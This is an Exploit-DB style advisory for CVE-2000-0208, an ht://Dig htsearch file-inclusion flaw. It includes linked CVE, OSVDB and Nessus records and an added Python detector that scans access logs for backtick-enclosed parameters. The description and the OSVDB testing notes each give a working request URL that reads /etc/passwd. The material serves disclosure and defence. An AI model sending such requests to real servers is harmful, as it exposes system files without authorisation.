The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 - Arbitrary File Inclusion
2000-02-29T00:00:00
ID: EDB-ID:19785
Type: exploitdb
Reporter: Geoff Hutchison
Modified: 2000-02-29T00:00:00
Description
The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 Arbitrary File Inclusion. CVE-2000-0208. Remote exploit for unix platform
source: http://www.securityfocus.com/bid/1026/info
ht://dig is a web content search engine for Unix platforms. The software is set up to allow for file inclusion from configuration files. Any string surrounded by the opening single quote character ( ` ), i.e. the backtick, is taken as a path to a file for inclusion, for example:
some_parameter: `var/htdig/some_file`
htdig will also allow included files to be specified via form input. Therefore, any file can be specified for inclusion into a variable by any web user.
The URL:
http ://target/cgi-bin/htsearch?Exclude=%60/etc/passwd%60
will return a page with the contents of /etc/passwd in the 'exclude' field.
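To check whether a server was probed this way, the web access log can be searched for htsearch requests whose decoded parameters contain a backtick-enclosed value. The following is an added example, not part of the original advisory; it assumes Common Log Format, the log lines are constructed, and the function name is hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2000:10:00:01 +0000] "GET /cgi-bin/htsearch?words=linux&config=htdig HTTP/1.0" 200 5120',
    '192.0.2.44 - - [01/Mar/2000:10:02:17 +0000] "GET /cgi-bin/htsearch?Exclude=%60/etc/passwd%60 HTTP/1.0" 200 2300',
    '192.0.2.45 - - [01/Mar/2000:10:03:09 +0000] "GET /cgi-bin/htsearch?words=x&exclude=`/etc/passwd` HTTP/1.0" 200 2300',
    '192.0.2.51 - - [01/Mar/2000:10:05:03 +0000] "GET /docs/backtick%60.html HTTP/1.0" 404 210',
    # Form data sent by POST is not recorded in an access log, so this
    # request cannot be judged from the log alone.
    '192.0.2.60 - - [01/Mar/2000:10:06:00 +0000] "POST /cgi-bin/htsearch HTTP/1.0" 200 4000',
]

# client address, method and request target from a Common Log Format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*"')
# a value (or part of one) enclosed in backticks, as in the config syntax
INCLUDE_RE = re.compile(r'`([^`]+)`')


def find_htsearch_includes(lines):
    """Return (client, parameter, path) for each backtick-enclosed
    value found in the query string of a request to htsearch."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        client, _method, target = m.groups()
        url = urlsplit(target)
        if not url.path.rstrip("/").endswith("/htsearch"):
            continue  # only the htsearch CGI is of interest here
        # parse_qsl percent-decodes, so %60 and a literal ` look the same
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            for path in INCLUDE_RE.findall(value):
                hits.append((client, name.lower(), path))
    return hits


if __name__ == "__main__":
    for client, name, path in find_htsearch_includes(SAMPLE_LOG):
        print(f"{client} requested inclusion of {path} via '{name}'")
```

The check looks at every parameter, not only Exclude, because the advisory describes the inclusion syntax as applying to form input in general.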
Related records
CVE-2000-0208 (cve), published 2000-02-29T00:00:00
The htdig (ht://Dig) CGI program htsearch allows remote attackers to read arbitrary files by enclosing the file name with backticks (`) in parameters to htsearch.
CVSS: 5.0 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/)
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0208
OSVDB:89 (osvdb), published 2000-02-28T13:51:06: ht://Dig htsearch.cgi Arbitrary File Access
Vulnerability Description: ht://Dig contains a flaw that allows a remote attacker to access arbitrary files. This flaw exists because the 'htsearch.cgi' script does not validate user-supplied input containing backticks (`), which could allow a remote attacker to access arbitrary files resulting in a loss of confidentiality.
Solution Description: Currently, there are no known workarounds or upgrades to correct this issue. However, The ht://Dig Group has released a patch to address this vulnerability.
Manual Testing Notes: http://[victim]/cgi-bin/htsearch?exclude=%60/etc/passwd%60
CVSS: 5.0 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/)
https://vulners.com/osvdb/OSVDB:89
References:
Vendor URL: http://www.htdig.org/
Vendor Specific Advisory URL: http://www.debian.org/security/2000/20000227
Vendor Specific Advisory URL: http://www.turbolinux.com/pipermail/tl-security-announce/2000-March/000004.html
Vendor Specific Advisory URL: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:06-htdig.asc
Vendor Specific Advisory URL: http://www.suse.de/de/security/suse_security_announce_42.txt
Nessus Plugin ID:10105: https://vulners.com/search?query=pluginID:10105
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2000-02/0385.html
ISS X-Force ID: 4052
CVE-2000-0208: https://vulners.com/cve/CVE-2000-0208
Bugtraq ID: 1026
HTDIG.NASL (nessus), published 2000-03-03T00:00:00: ht://Dig < 3.1.5 htsearch CGI Multiple Vulnerabilities
The 'htsearch' CGI, which is part of the htdig package, allows anyone to read arbitrary files on the target host.
CVSS: 7.5 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/)
CVE list: CVE-1999-0978, CVE-2000-0208
https://www.tenable.com/plugins/index.php?view=single&id=10105